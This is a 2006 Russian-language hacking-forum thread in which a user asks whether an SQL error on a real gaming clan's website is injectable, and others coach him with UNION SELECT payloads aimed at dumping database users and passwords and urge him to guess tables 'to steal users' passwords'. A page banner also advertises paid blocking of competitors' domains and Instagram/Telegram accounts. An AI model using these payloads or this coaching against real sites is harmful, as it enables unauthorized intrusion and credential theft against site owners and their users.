Форум АНТИЧАТ - дЫРА ли это?

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Оффтоп > Болталка
дЫРА ли это?

Опции темы

Поиск в этой теме

Опции просмотра

дЫРА ли это?

03.06.2006, 12:11

temon

Участник форума

Регистрация: 06.02.2005

Сообщений: 130

Провел на форуме:
172723

Репутация: 5

дЫРА ли это?

пРИВЕТ всем.
Тут на сайте одного из кланов БК нашел вот что.
Если сделать запрос на статью:
newsid='
то вылазит:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/xxx/public_html/modules/comments/comments.php on line 72

sql-injection можно провести с помошью этого?

Последний раз редактировалось temon; 03.06.2006 в 12:27..

03.06.2006, 12:14

SanyaX

.::Club Life::.

Регистрация: 28.01.2005

Сообщений: 1,205

Провел на форуме:
7426415

Репутация: 1398

Отправить сообщение для SanyaX с помощью ICQ

Хм а что ты нас то спрашиваешь. Ты сам не пробовал. Попробуй провести такой запрос

Код:

+union+select+1,2,user,password,5,6+from+mysql.user/*

Если скажет acces denied то 100% скуль. Вот тебе статьи если что по скулям.
http://www.forum.antichat.ru/thread19684.html
http://www.forum.antichat.ru/thread19605.html

__________________
-=Ok let's Go=-
-=OpenVPN=-

03.06.2006, 12:28

temon

Участник форума

Регистрация: 06.02.2005

Сообщений: 130

Провел на форуме:
172723

Репутация: 5

спасибо. проверю

03.06.2006, 12:58

temon

Участник форума

Регистрация: 06.02.2005

Сообщений: 130

Провел на форуме:
172723

Репутация: 5

ура!!!
сделал запрос:
-1+union+select+1,2,3,4,5/*
прокатило все.
а как дальше строить запрос. помогите пожалуйста.
да вот вытянул название бд и юзера.
но не получаетсяс помошью этого:
-1+union+select+1,2,user,password,5+from+mysql.us er/*
вытянусть пасс

Последний раз редактировалось temon; 03.06.2006 в 13:10..

04.06.2006, 07:27

temon

Участник форума

Регистрация: 06.02.2005

Сообщений: 130

Провел на форуме:
172723

Репутация: 5

мне кто нить поможет в конце концов?

04.06.2006, 09:36

K[o]S

Новичок

Регистрация: 29.07.2005

Сообщений: 20

Провел на форуме:
357093

Репутация: 13

Нет прав на доступ к базе mysql .

04.06.2006, 10:38

Utochka

Постоянный

Регистрация: 21.12.2005

Сообщений: 620

Провел на форуме:
1867718

Репутация: 268

подбирай названия таблиц и столбцов, чтобы спереть пассы юзверей.

Об sql можешь почитать тут ->->-> http://xzone.org.ru/index.php?name=Pages&op=page&pid=56

Последний раз редактировалось NeX; 04.06.2006 в 10:40..

04.06.2006, 10:58

SanyaX

.::Club Life::.

Регистрация: 28.01.2005

Сообщений: 1,205

Провел на форуме:
7426415

Репутация: 1398

-1+union+select+1,2,user,password,5+from+mysql.user/*
Пропиши и дай лог что выдала страница.

__________________
-=Ok let's Go=-
-=OpenVPN=-

04.06.2006, 20:12

temon

Участник форума

Регистрация: 06.02.2005

Сообщений: 130

Провел на форуме:
172723

Репутация: 5

ничего не выдала.
точнее то что и при простом ошибочном запросе.
даже столбцов нету
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/xxx/public_html/modules/comments/comments.php on line 72

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Привет от Tclover'a	Elekt	Болталка	13	02.03.2009 21:15
Открытое письмо журналу "Хакер"	TheFile	Болталка	34	31.01.2009 21:03
Мобилография - это серьезно	novichok	Сотовый фрикинг	1	06.03.2006 15:31
Что ломать?	Almight	Чаты	3	09.02.2004 18:48

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход